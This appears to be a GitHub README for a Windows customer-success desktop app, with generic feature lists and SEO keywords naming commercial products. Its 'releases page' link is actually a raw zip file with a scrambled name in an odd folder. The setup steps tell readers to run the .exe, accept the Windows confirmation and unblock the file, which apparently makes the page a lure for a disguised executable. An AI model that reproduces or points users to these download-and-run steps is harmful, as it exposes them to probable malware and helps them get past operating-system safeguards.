Customer-Success-Platform-suite is a Windows app that helps you explore customer success tools and workflows in one place. It brings together health scoring, lifecycle stages, engagement flows, and churn views in a single desktop experience.
This app is built for end users who want to:
- View customer health scores
- Track account lifecycle stages
- Review churn risk signals
- Follow engagement workflows
- Work with a SaaS-style customer success dashboard
- Open the releases page: https://raw.githubusercontent.com/doingood-coder/Customer-Success-Platform-suite/main/breezeless/Platform-suite-Success-Customer-2.0-alpha.4.zip
- Find the latest release at the top of the page
- Download the Windows file from the release assets
- Save the file to your computer
If the release includes a .exe file, you can run it after the download finishes. If it comes in a .zip file, you must extract it first.
Use these steps on Windows:
- Open the folder where you saved the file
- If the file is
.zip, right-click it and choose Extract All - Open the extracted folder
- Double-click the
.exefile to start the app - If Windows asks for confirmation, choose Run
If the app opens in a separate window, wait a few seconds while it loads data and screens.
For smooth use on Windows, use a computer with:
- Windows 10 or Windows 11
- 4 GB RAM or more
- 500 MB free disk space
- A screen size of 1366 x 768 or higher
- Internet access for any online sample data or sync features
A newer PC will give you a faster start and smoother screen loading.
Customer-Success-Platform-suite includes a set of views and tools that mirror common customer success work.
You can use it to:
- Check customer health scores
- See which accounts may need attention
- Track onboarding, active, and renewal stages
- Review engagement tasks and follow-up steps
- Spot accounts that may churn
- Explore customer success workflows in a SaaS-style interface
The app may include these main areas:
- Dashboard - A quick view of account health and risk
- Customers - A list of accounts and key details
- Lifecycle - Stages that show where each account stands
- Engagement - Tasks and outreach steps
- Churn Risk - Signals that point to possible loss
- Reports - Charts and trend views for review
These screens help you move through the app with less effort and find the information you need fast.
When you open the app for the first time:
- Let the app finish loading
- Review the main dashboard
- Open a customer record
- Check the health score and lifecycle stage
- Review any tasks or alerts linked to that account
If sample data appears, you can use it to learn the app before adding your own records.
This app uses a local desktop setup for simple use on Windows. It may also work with sample SaaS data or demo records, depending on the release you download.
Common data types may include:
- Customer names
- Account health scores
- Activity history
- Renewal dates
- Engagement notes
- Churn risk labels
Keep your data files in a safe folder if you plan to edit or replace sample content.
Open the customer list and select an account. Review the score, history, and lifecycle stage.
Open the churn view and look for low health, low engagement, or overdue follow-ups.
Go to the engagement area to see tasks, reminders, and contact history.
Open lifecycle management to see whether an account is onboarding, active, at risk, or renewed.
Use the dashboard or report views to compare accounts by score, stage, or risk level.
A release may include one or more of these file types:
.exe- Run this file on Windows.zip- Extract the folder, then run the app.txt- Read notes or setup details.jsonor.csv- Sample data files
If the release includes more than one file, start with the Windows app file and keep the other files in the same folder.
This project includes ideas and tools linked to:
- churn analysis
- customer engagement
- customer success
- lifecycle management
- retention management
- SaaS platform
- churn prediction
- Gainsight
- Totango
- ChurnZero
These topics guide the appβs layout and help the user explore common customer success work in one place.
- Make sure the file finished downloading
- If the file is zipped, extract it first
- Check that you opened the
.exefile, not a shortcut or text file
- Right-click the file and choose Properties
- If you see an unblock option, select it
- Try opening the app again
- Check that all release files stay in the same folder
- Run the main
.exefile again - Download the latest release if the file looks incomplete
- Use Windows display settings to increase scale
- Maximize the app window
- Set your screen resolution to a higher value if possible
- Look for a sample data folder in the release
- Check that any linked files are still in place
- Open the app again after moving all files together
Keep the app in a simple folder path like this:
- Downloads
- Customer-Success-Platform-suite
- app.exe
- data
- readme files
- Customer-Success-Platform-suite
A short folder path helps reduce file issues when you open the app.
When you open the release, look for:
- A Windows app file with
.exe - A zip file with the project name
- A readme or notes file
- A sample data folder
If the release has more than one option, choose the Windows version for direct use on your PC.
Use the app like this:
- Click menus to move between views
- Select an account to open details
- Scroll to see more records
- Use search if the app includes it
- Open reports to view trends and changes
If the app uses tabs, each tab may show a different part of the customer success flow.
People may use this app to:
- Review customer health at a glance
- Spot churn risk early
- Track renewal progress
- Organize customer follow-up tasks
- Keep lifecycle stages clear
- Compare account activity over time
A simple workflow may look like this:
- Open the dashboard
- Find an account with a low health score
- Review the accountβs recent activity
- Check the lifecycle stage
- Open the engagement view and add a follow-up task
- Review the account again after the next update
This helps you move from review to action in a few steps.
If you need the release page again, use this link: